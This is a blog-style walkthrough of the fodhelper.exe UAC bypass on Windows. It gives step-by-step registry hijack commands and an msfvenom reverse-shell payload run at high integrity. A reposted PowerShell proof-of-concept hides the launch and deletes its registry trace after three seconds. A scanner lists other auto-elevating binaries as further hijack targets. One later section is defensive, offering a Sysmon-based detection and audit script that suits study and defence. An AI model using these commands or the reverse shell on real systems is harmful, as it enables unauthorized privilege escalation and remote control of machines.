Bypass UAC Fodhelper

Bypass UAC fodhelper.exe

sigcheck.exe -m C:\Windows\System32\fodhelper.exe

Output:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly
xmlns="urn:schemas-microsoft-com:asm.v1"
xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"
manifestVersion="1.0">
<assemblyIdentity type="win32" publicKeyToken="6595b64144ccf1df" name="Microsoft.Windows.FodHelper" version="5.1.0.0" processorArchitecture="amd64"/>
<description>Features On Demand Helper UI</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="requireAdministrator"
/>
</requestedPrivileges>
</security>
</trustInfo>
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
<autoElevate>true</autoElevate>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>

The manifest shows that the application is meant to run as an administrative user and therefore requires a full administrator access token:

<requestedPrivileges>
<requestedExecutionLevel
level="requireAdministrator"
/>
</requestedPrivileges>

level='requireAdministrator': The application runs using administrator permissions. The user who starts the application must be a member of the Administrators group. If the opening process isn’t running with administrative permissions, the system prompts for credentials.


In addition, the autoElevate flag is set to true, which lets the executable elevate to high integrity automatically, without asking the administrator for consent. Two conditions apply: the user running it must already be a member of the local Administrators group (so the medium-integrity process holds a filtered admin token that UAC can unfilter), and UAC must not be set to "Always notify", because at that level even Windows binaries prompt. The bypass therefore turns a medium-integrity admin session into a high-integrity one; it does nothing for a standard user.

<autoElevate>true</autoElevate>
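fodhelper.exe is not the only binary with this combination. The following is an added example (not code from the original post) that scans System32 for executables whose embedded manifest carries both requireAdministrator and autoElevate, the same pair sigcheck showed above. It assumes the RT_MANIFEST resource is stored as plain ASCII XML (true for Microsoft-built binaries), so a byte-level search is enough; the function name Find-AutoElevateBinary is mine.

```powershell
# Added example, not part of the original post: find every System32 executable
# whose embedded manifest has requestedExecutionLevel="requireAdministrator"
# together with <autoElevate>true</autoElevate>, like fodhelper.exe.
# Assumption: the manifest resource is plain ASCII XML, so searching the raw
# bytes is sufficient (no parsing of the PE resource table).
function Find-AutoElevateBinary {
    [CmdletBinding()]
    param(
        # Auto-elevation only applies to Windows-signed binaries in trusted
        # directories, so System32 is the interesting place to look.
        [string]$Path = "$env:SystemRoot\System32"
    )

    $autoElevate = [regex]'<autoElevate>\s*true\s*</autoElevate>'
    # First level="..." attribute in the file; in a manifest that is requestedExecutionLevel.
    $execLevel   = [regex]'level\s*=\s*[''"]([A-Za-z]+)[''"]'

    Get-ChildItem -Path $Path -Filter *.exe -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            try {
                $bytes = [System.IO.File]::ReadAllBytes($_.FullName)
            } catch {
                return    # locked or access-denied file; skip it
            }
            $text = [System.Text.Encoding]::ASCII.GetString($bytes)
            if (-not $autoElevate.IsMatch($text)) { return }

            $m = $execLevel.Match($text)
            [pscustomobject]@{
                Name           = $_.Name
                ExecutionLevel = if ($m.Success) { $m.Groups[1].Value } else { 'unknown' }
                SizeKB         = [int]($_.Length / 1KB)
            }
        }
}

# Usage: list the auto-elevating binaries and count those that need a full admin token
$candidates = @(Find-AutoElevateBinary)
$candidates | Sort-Object Name | Format-Table -AutoSize
$adminOnly = @($candidates | Where-Object ExecutionLevel -eq 'requireAdministrator').Count
"{0} auto-elevate binaries, {1} of them requireAdministrator" -f $candidates.Count, $adminOnly
```

Every hit is a candidate for the same Process Monitor exercise: filter on the process name, look for registry or file lookups that fail in a user-writable location (HKCU, the user profile) and succeed in a machine-wide one, and you have the next hijack point to test.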


Process Monitor Filter:

  • Process Name is fodhelper.exe
  • Operation contains Reg
  • Result is NAME NOT FOUND
  • Path contains HKCU

The following entry appears:

HKCU\Software\Classes\ms-settings\Shell\Open\Command    NAME NOT FOUND

fodhelper.exe tries to query the HKCU:\Software\Classes\ms-settings\shell\open\command key, which does not exist for this user, so the lookup returns NAME NOT FOUND.

Widen the filter to see what happens right after that failed lookup. Remove these two rules:

  • Path contains HKCU
  • Result is NAME NOT FOUND

The trace now shows:

HKCU\Software\Classes\ms-settings\Shell\Open\Command    NAME NOT FOUND
HKCR\ms-settings\Shell\Open\Command SUCCESS

As soon as the lookup of ms-settings\shell\open\command fails in HKCU, the same key is read from HKCR, where it exists. HKCR is not a separate hive: it is a merged view of HKLM\SOFTWARE\Classes and HKCU\Software\Classes, and the per-user branch takes precedence. The per-user branch is writable without elevation, so whatever a medium-integrity process puts there is what the elevated fodhelper.exe will honour.



Look at the values under HKEY_CLASSES_ROOT\ms-settings\Shell\Open\Command:

(default)          REG_SZ    (value not set)
DelegateExecute REG_SZ {xxxx-xxxx-xxxx-xxxx-xxxxxx}

The missing key can now be created in HKCU to hijack the lookup and obtain a high-integrity process. The DelegateExecute value matters: in HKCR it holds the CLSID of the COM handler that normally services the open verb. If the value is present but empty, the shell skips the COM handler and falls back to the command line stored in the (default) value, so the hijacked key must carry an empty DelegateExecute next to the payload:

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

With the key in place, run Process Monitor again; both lookups now succeed in HKCU:

HKCU\Software\Classes\ms-settings\Shell\Open\command                    SUCCESS
HKCU\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute SUCCESS

Set the payload as the (default) value and verify the key:

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

# QUERY Value
REG QUERY HKCU\Software\Classes\ms-settings\Shell\Open\command

# HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
# (Default) REG_SZ cmd.exe
# DelegateExecute REG_SZ

Check the privileges of the current token with whoami /priv. This is the filtered, medium-integrity token of a user who is a member of the local Administrators group: only five privileges, none of them useful on their own:

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

Run fodhelper.exe:

Start-Process -FilePath C:\Windows\System32\fodhelper.exe

A cmd window appears. Run whoami /priv in it: this is the unfiltered administrator token (SeDebugPrivilege, SeBackupPrivilege, SeImpersonatePrivilege and the rest), i.e. a high-integrity process:

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

Reverse High Mandatory Level Shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.12.1.12 LPORT=4444 -f exe -o callme.exe

Point the (default) value at the staged payload (the path must be readable by the elevated process) and launch fodhelper.exe again:

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Users\Public\Documents\callme.exe" /f

Remove the key afterwards. If it is left behind it is both a persistent indicator of compromise and a trap that fires every time this user launches fodhelper.exe:

REG DELETE HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell /f
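The defensive side of everything above: the HKCR shadowing seen in the Process Monitor trace, the per-user key the hijack leaves behind, the UAC level the bypass depends on, and the Medium-to-High integrity jump visible in the two whoami /priv listings. This is an added example, not code from the original post or from the winscripting script below. It assumes Sysmon is installed with registry value-set events (Event ID 13) enabled and uses whoami /groups for the integrity label; the function names Get-UacStatus, Get-TokenIntegrity, Test-MsSettingsHijack and Get-MsSettingsHijackEvents are mine.

```powershell
# Added example, not part of the original post: audit a host for the
# preconditions of the fodhelper bypass and for the ms-settings hijack itself.
# Assumptions: Sysmon logs registry value-set events (Event ID 13), and
# whoami /groups is available to read the token's integrity label.

function Get-UacStatus {
    # UAC policy lives under HKLM. ConsentPromptBehaviorAdmin: 2 = "Always notify"
    # (auto-elevate still prompts), 5 = default (Windows binaries elevate silently),
    # 0 = elevate everything without prompting.
    $v = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        EnableLUA                  = $v.EnableLUA
        ConsentPromptBehaviorAdmin = $v.ConsentPromptBehaviorAdmin
        SilentAutoElevate          = ($v.EnableLUA -eq 1 -and $v.ConsentPromptBehaviorAdmin -ne 2)
    }
}

function Get-TokenIntegrity {
    # whoami lists the mandatory label as a pseudo-group with an S-1-16-* SID.
    # .NET's WindowsIdentity.Groups filters that entry out, hence the CSV route.
    $row = whoami /groups /fo csv | ConvertFrom-Csv | Where-Object { $_.SID -like 'S-1-16-*' }
    switch ($row.SID) {
        'S-1-16-8192'  { 'Medium' }
        'S-1-16-12288' { 'High' }
        'S-1-16-16384' { 'System' }
        default        { $row.'Group Name' }
    }
}

function Test-MsSettingsHijack {
    # HKCR is a merged view: HKCU\Software\Classes overrides HKLM\SOFTWARE\Classes,
    # so a per-user ms-settings key shadows the real handler for this user only.
    $userKey    = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
    $machineKey = 'HKLM:\SOFTWARE\Classes\ms-settings\Shell\Open\Command'
    $r = [pscustomobject]@{
        MachineHandlerPresent = Test-Path $machineKey
        UserKeyPresent        = Test-Path $userKey
        UserCommand           = $null
        UserDelegateExecute   = $null
        Suspicious            = $false
    }
    if ($r.UserKeyPresent) {
        $p = Get-ItemProperty -Path $userKey
        $r.UserCommand         = $p.'(default)'
        $r.UserDelegateExecute = $p.DelegateExecute
        # No legitimate software registers ms-settings per user; treat any copy as
        # suspicious. An empty DelegateExecute plus a command line is the textbook hijack.
        $r.Suspicious = $true
    }
    $r
}

function Get-MsSettingsHijackEvents {
    param([int]$Hours = 24)
    # Sysmon Event ID 13 = RegistryEvent (Value Set). Sysmon writes per-user paths
    # as HKU\<SID>\..., not HKCU, so match only the tail of the key.
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'ms-settings\\Shell\\Open\\command' } |
        ForEach-Object {
            $data = @{}
            ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
            [pscustomobject]@{
                Time         = $_.TimeCreated
                Image        = $data.Image
                TargetObject = $data.TargetObject
                Details      = $data.Details
            }
        }
}

# Usage: one-shot report for the current user and host
$uac = Get-UacStatus
"UAC: EnableLUA={0} ConsentPromptBehaviorAdmin={1} silent auto-elevate={2}" -f `
    $uac.EnableLUA, $uac.ConsentPromptBehaviorAdmin, $uac.SilentAutoElevate
"Current token integrity: $(Get-TokenIntegrity)"
Test-MsSettingsHijack | Format-List
Get-MsSettingsHijackEvents | Format-Table -AutoSize
```

Run it before and after the bypass: the integrity reads Medium in the original session and High inside the spawned shell, and Test-MsSettingsHijack keeps flagging the key until it is removed with the REG DELETE above. The Sysmon query maps to a simple SIEM rule, Event ID 13 with a TargetObject ending in ms-settings\Shell\Open\command\(Default), which catches the hijack even when the attacker cleans up three seconds later as the script below does.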


Using PowerShell

<#
.SYNOPSIS
This script is a proof of concept to bypass the User Access Control (UAC) via fodhelper.exe
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform an UAC bypass to start any application.

ATTENTION: Do not try this on your productive machine!
.NOTES
Function : FodhelperBypass
File Name : FodhelperBypass.ps1
Author : Christian B. - winscripting.blog
.LINK
https://github.com/winscripting/UAC-bypass
.EXAMPLE
Load "cmd.exe /c powershell.exe" (it's default):
FodhelperBypass
Load specific application:
FodhelperBypass -program "cmd.exe"
FodhelperBypass -program "cmd.exe /c powershell.exe"

#>

function FodhelperBypass()
{
Param (
[String]$program = "cmd /c start powershell.exe" #default
)

#Create registry structure
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force

#Perform the bypass
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

#Remove registry structure
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

}

Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.